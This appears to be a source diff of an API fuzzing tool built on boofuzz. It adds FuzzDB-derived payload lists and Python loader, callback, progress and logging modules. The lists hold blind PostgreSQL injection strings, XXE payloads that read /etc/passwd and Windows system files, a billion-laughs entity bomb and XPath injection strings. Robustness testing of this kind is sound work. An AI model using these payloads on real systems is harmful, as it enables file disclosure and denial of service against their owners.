fuzzer/src/payloads/lists/sql-injection/postgre-blind.txt Normal file
View File

@@ -0,0 +1,12 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/GenericBlind.txt)
pg_sleep(200000)--
1 or pg_sleep(200000)--
" or pg_sleep(200000)--
' or pg_sleep(200000)--
1) or pg_sleep(200000)--
") or pg_sleep(200000)--
') or pg_sleep(200000)--
1)) or pg_sleep(200000)--
")) or pg_sleep(200000)--
')) or pg_sleep(200000)--

6
fuzzer/src/payloads/lists/unicode/corrupted.txt Normal file
View File

@@ -0,0 +1,6 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮

9
fuzzer/src/payloads/lists/unicode/emoji.txt Normal file
View File

@@ -0,0 +1,9 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
😍
👩🏽
👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
🐵 🙈 🙉 🙊
❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
0⃣ 1⃣ 2⃣ 3⃣ 4⃣ 5⃣ 6⃣ 7⃣ 8⃣ 9⃣ 🔟

2
fuzzer/src/payloads/lists/unicode/imessage.txt Normal file
View File

@@ -0,0 +1,2 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/control-chars/imessage.txt)
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗

12
fuzzer/src/payloads/lists/unicode/japanese-emoticon.txt Normal file
View File

@@ -0,0 +1,12 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
(。◕ ∀ ◕。)
`ィ(´∀`∩
__ロ(,_,*)
・( ̄∀ ̄)・:*:
゚・✿ヾ╲(。◕‿◕。)╱✿・゚
,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
(╯°□°)╯︵ ┻━┻)
(ノಥ益ಥ)ノ ┻━┻
┬─┬ノ( º _ ºノ)
( ͡° ͜ʖ ͡°)

21
fuzzer/src/payloads/lists/unicode/naughty-unicode.txt Normal file
View File

@@ -0,0 +1,21 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
Ω≈ç√∫˜µ≤≥÷
åß∂ƒ©˙∆˚¬…æ
œ∑´®†¥¨ˆøπ“‘
¡™£¢∞§¶•ªº–≠
¸˛Ç◊ı˜Â¯˘¿
ÅÍÎÏ˝ÓÔÒÚÆ☃
Œ„´‰ˇÁ¨ˆØ∏”’
`⁄€‹›fifl‡°·‚—±
⅛⅜⅝⅞
ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
٠١٢٣٤٥٦٧٨٩
⁰⁴⁵
₀₁₂
⁰⁴⁵₀₁₂
ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็

4
fuzzer/src/payloads/lists/unicode/regional-indicators.txt Normal file
View File

@@ -0,0 +1,4 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
🇺🇸🇷🇺🇸🇦🇫🇦🇲
🇺🇸🇷🇺🇸🇦

6
fuzzer/src/payloads/lists/unicode/right-to-left.txt Normal file
View File

@@ -0,0 +1,6 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
הָיְתָהtestالصفحات التّحول

10
fuzzer/src/payloads/lists/unicode/two-byte-chars.txt Normal file
View File

@@ -0,0 +1,10 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
田中さんにあげて下さい
パーティーへ行かないか
和製漢語
部落格
사회과학원 어학연구소
찦차를 타고 온 펲시맨과 쑛다리 똠방각하
社會科學院語學研究所
울란바토르
𠜎𠜱𠝹𠱓𠱸𠲖𠳏

3
fuzzer/src/payloads/lists/unicode/upsidedown.txt Normal file
View File

@@ -0,0 +1,3 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
00˙Ɩ$-

9
fuzzer/src/payloads/lists/xml/xml-generic.txt Normal file
View File

@@ -0,0 +1,9 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
# General timeouts
count(/child::node())
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
# Billion laughs attack
<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>
"<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>"

16
fuzzer/src/payloads/lists/xml/xml-non-existing-file-paths.txt Normal file
View File

@@ -0,0 +1,16 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
"<xml SRC=""c:\boot.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\unknown\unknown"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\unknown\unknown">]><foo>&xee;</foo>o>
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\unknown\unknown">
"<xml SRC=""/unknown/unknown"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////unknown/unknown"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///unknown/unknown">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///unknown/unknown">
"<xml SRC=""/unknown/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////unknown/"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///unknown/">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///unknown/">

23
fuzzer/src/payloads/lists/xml/xml-unix-existing-file-paths.txt Normal file
View File

@@ -0,0 +1,23 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
"<xml SRC=""/apache/logs/access.log"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""/etc/passwd"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""/apache/logs/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""/etc/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////apache/logs/access.log"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////apache/logs/"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///apache/logs/access.log">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///apache/logs/">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs/access.log">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs/">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc">

35
fuzzer/src/payloads/lists/xml/xml-windows-existing-file-paths.txt Normal file
View File

@@ -0,0 +1,35 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
"<xml SRC=""c:\boot.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\inetpub\wwwroot\index.asp"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\pagefile.sys"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\Windows\system.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\Windows\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\inetpub\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\inetpub\wwwroot\index.asp"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\pagefile.sys"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\Windows\system.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\Windows\"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\inetpub\"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\inetpub\wwwroot\index.asp">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\pagefile.sys">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\Windows\system.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\Windows\">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\inetpub\">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\boot.ini">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub\wwwroot\index.asp">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\pagefile.sys">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows\system.ini">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows\">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub\">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub">

15
fuzzer/src/payloads/lists/xml/xpath.txt Normal file
View File

@@ -0,0 +1,15 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xpath/xpath-injection.txt)
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1

48
fuzzer/src/payloads/payloads_loader.py Normal file
View File

@@ -0,0 +1,48 @@
import os
from fuzz_payloads import FuzzPayloads
class PayloadsLoader:
def __init__(self, hostname):
self.replacements = {"<<target_hostname>>": hostname}
def load_payloads(self, file_path: str, directory_name: str, keep_newlines: bool = False):
if file_path:
try:
with open(file_path, 'r', encoding="utf8") as custom_payloads_file_pointer:
for line in custom_payloads_file_pointer:
# Skip empty lines
if self._is_empty_or_comment(line):
continue
line = self._replace_target_hostname(line)
if not keep_newlines:
line = line.rstrip('\n').rstrip('\r\n')
FuzzPayloads.add_payload_to_list(line, directory_name)
# If there is some problem with file, just continue with the rest of payloads
except FileNotFoundError or IOError:
print("WARNING: Error when opening file: " + file_path)
def _replace_target_hostname(self, line: str):
for pattern, replacement_value in self.replacements.items():
line = line.replace(pattern, replacement_value)
return line
@staticmethod
def _is_empty_or_comment(line):
# Comment is every line which starts (without white spaces) with '#'
if len(line.strip()) == 0 or line.startswith("#"):
return True
def load_default_payloads(hostname: str):
loader = PayloadsLoader(hostname)
base_path = './fuzzer/src/payloads/lists/'
for root, directories, files in os.walk(base_path):
for file in files:
if file.endswith('.txt'):
directory_name = os.path.basename(os.path.normpath(root))
loader.load_payloads(os.path.join(root, file), directory_name)

48
fuzzer/src/post_test_case_callback.py Normal file
View File

@@ -0,0 +1,48 @@
import time
import json
from http.client import HTTPResponse
from boofuzz import exception
from configuration_manager import ConfigurationManager
from fake_socket import get_response_object
class PostTestCaseCallback(object):
@staticmethod
def post_test_callback(target, fuzz_data_logger, session, sock, *args, **kwargs):
fuzz_data_logger.log_info("Mutation: " + session.fuzz_node.mutant._rendered.decode('utf-8', errors='ignore'))
fuzz_data_logger.log_info("Original value: " + session.fuzz_node.mutant.original_value.decode('utf-8', errors='ignore'))
response_timeout = ConfigurationManager.config["response_timeout"]
polling_interval = ConfigurationManager.config["polling_interval"]
response_string = None
for _ in range(0, int(response_timeout / polling_interval)):
try:
response_string = target.recv()
break
except exception.BoofuzzTargetConnectionReset:
time.sleep(polling_interval)
continue
if not response_string:
fuzz_data_logger.log_fail("Timeout or closed connection")
return
response = get_response_object(response_string)
if get_response_object(response_string) is None:
fuzz_data_logger.log_fail("Bad HTTP header")
return
PostTestCaseCallback._http_response_asserts(response, fuzz_data_logger)
@staticmethod
def _http_response_asserts(response: HTTPResponse, fuzz_data_logger):
if response.status >= 500:
fuzz_data_logger.log_fail("Status code higher or equal than 500!")
if response.getheader("Content-Type") == "application/json":
try:
json.loads(response.read())
except ValueError:
fuzz_data_logger.log_fail("application/json body is not valid JSON structure")

61
fuzzer/src/progress_reporter.py Normal file
View File

@@ -0,0 +1,61 @@
import os
import threading
import sys
import datetime
from configuration_manager import ConfigurationManager
DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS = 5
def report_progress(session):
if did_fuzzing_already_started(session) > 0:
if is_fuzzing_hanged(session):
message = create_hanged_message(session)
print(message, file=sys.stderr)
os._exit(1)
if is_fuzzing_still_in_progress(session):
plan_another_report(session, ConfigurationManager.get_reporting_interval())
message = create_report_message(session)
print(message, file=sys.stderr)
else:
plan_another_report(session, DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS)
def plan_another_report(session, reporting_interval):
threading.Timer(reporting_interval, report_progress, [session]).start()
def did_fuzzing_already_started(session):
return session.total_num_mutations > 0
def is_fuzzing_hanged(session):
hanged = is_fuzzing_hanged.previous_mutant_index == session.total_mutant_index
is_fuzzing_hanged.previous_mutant_index = session.total_mutant_index
return hanged
is_fuzzing_hanged.previous_mutant_index = -1
def is_fuzzing_still_in_progress(session):
return session.total_num_mutations != session.total_mutant_index
def create_report_message(session):
percentage = session.total_mutant_index / session.total_num_mutations * 100
percentage = str(round(percentage, 2))
message = str(datetime.datetime.now()) + ": "
message += "Proceeded " + str(session.total_mutant_index) + " of "
message += str(session.total_num_mutations) + " (" + percentage + "%) test cases"
return message
def create_hanged_message(session):
test_case_number = str(session.total_mutant_index)
return "Fuzzing hangs on test case number: " + test_case_number + ". See log file for an error message."

101
fuzzer/src/request_build_helper.py Normal file
View File

@@ -0,0 +1,101 @@
import json
from boofuzz import s_static, s_size
from fuzz_payloads import s_http_string, s_http_number, s_http_boolean
from encodings_helper import EncodingTypes
from parameter import Parameter
class RequestBuildHelper(object):
# Content-length and Host are mandatory
@staticmethod
def generate_headers(config):
# Append headers from config
headers = config["headers"]
if headers is not None:
for key, value in headers.items():
s_static(key + ": " + value)
s_static("\r\n")
# Append host, if it is not provided in config
if not RequestBuildHelper._is_header_in_config(headers, "Host"):
s_static("Host: " + config["target"]["hostname"])
s_static("\r\n")
# Append content-length, if it is not provided in config
if not RequestBuildHelper._is_header_in_config(headers, "Content-Length"):
s_static('Content-Length: ')
# s_size calculates the byte length of Boofuzz block with name "body",
# which contains whole HTTP request content part. with actual mutation.
s_size("body", output_format="ascii", fuzzable=False)
@staticmethod
def _is_header_in_config(headers, header_name):
return headers is not None and header_name in headers
@staticmethod
def generate_uri(uri, uri_parameters, config, fuzzable=False):
fixed_attributes = config["fixed_url_attributes"] if "fixed_url_attributes" in config else None
id_generator = _unique_uri_attribute_id()
while True:
try:
# Find first not yet found parameter, if there is one
index = uri.index("{")
prefix = uri[0:index]
s_http_string(prefix, fuzzable=False, encoding=EncodingTypes.ascii)
uri = uri[index + 1:]
index = uri.index("}")
parameter_name = uri[0:index]
parameter: Parameter = RequestBuildHelper._get_parameter(parameter_name, fixed_attributes, uri_parameters)
name = "URI attribute, default value: " + parameter.value + ", id: " + next(id_generator)
is_part_fuzzable = fuzzable and not parameter.is_from_config
if parameter.data_type and (parameter.data_type == 'integer' or parameter.data_type == 'number'):
s_http_number(parameter.value, fuzzable=is_part_fuzzable, encoding=EncodingTypes.urlencoded, name=name)
elif parameter.data_type and parameter.data_type == 'string':
s_http_boolean(parameter.value, fuzzable=is_part_fuzzable, encoding=EncodingTypes.urlencoded, name=name)
else:
s_http_string(parameter.value, fuzzable=is_part_fuzzable, encoding=EncodingTypes.urlencoded, name=name)
uri = uri[index + 1:]
except ValueError:
if len(uri) > 0:
name = "URI attribute, default value: " + uri + ", id: " + next(id_generator)
s_http_string(uri, fuzzable=False, encoding=EncodingTypes.ascii, name=name)
break
# Getting parameter value from these sources (ordered):
# 1] Fixed attributes from config
# 2] Example value from documentation
# 3] Placeholder 'attribute'
@staticmethod
def _get_parameter(parameter_name, fixed_attributes, uri_parameters) -> Parameter:
if fixed_attributes is not None and parameter_name in fixed_attributes:
return Parameter(parameter_name, fixed_attributes[parameter_name], None, None, True)
elif any(parameter["Name"] == parameter_name for parameter in uri_parameters):
for parameter in uri_parameters:
if parameter["Name"] == parameter_name:
return Parameter(parameter_name, parameter["ExampleValue"], parameter["Type"], parameter["Format"], False)
else:
return Parameter(parameter_name, 'attribute', None, None, False)
@staticmethod
def is_string_valid_json(input_string: str) -> bool:
try:
json.loads(input_string)
return True
except ValueError:
return False
@staticmethod
def get_request_name(uri, method_type) -> str:
return uri + ", " + method_type
def _unique_uri_attribute_id():
sequence = 0
while True:
yield str(sequence)
sequence += 1

46
fuzzer/src/text_logger.py Normal file
View File

@@ -0,0 +1,46 @@
from boofuzz import FuzzLoggerText, helpers
from fake_socket import get_response_object
class TextLogger(FuzzLoggerText):
def open_test_step(self, description):
self._print_log_msg(msg=description, msg_type='step')
def log_check(self, description):
self._print_log_msg(msg=description, msg_type='check')
def log_error(self, description):
self._print_log_msg(msg=description, msg_type='error')
# Log full response just when it is needed
def log_recv(self, data):
response = get_response_object(data)
if response is None or response.status >= 300:
self._print_log_msg(data=data, msg_type='receive')
else:
message = "Returned status code " + str(response.status) + ", received message omitted."
self._print_log_msg(msg=message, msg_type='info')
def log_send(self, data):
self._print_log_msg(data=data, msg_type='send')
def log_info(self, description):
pass
def open_test_case(self, test_case_id, name, index, *args, **kwargs):
self._print_log_msg(msg=test_case_id, msg_type='test_case')
def log_fail(self, description=""):
self._print_log_msg(msg=description, msg_type='fail')
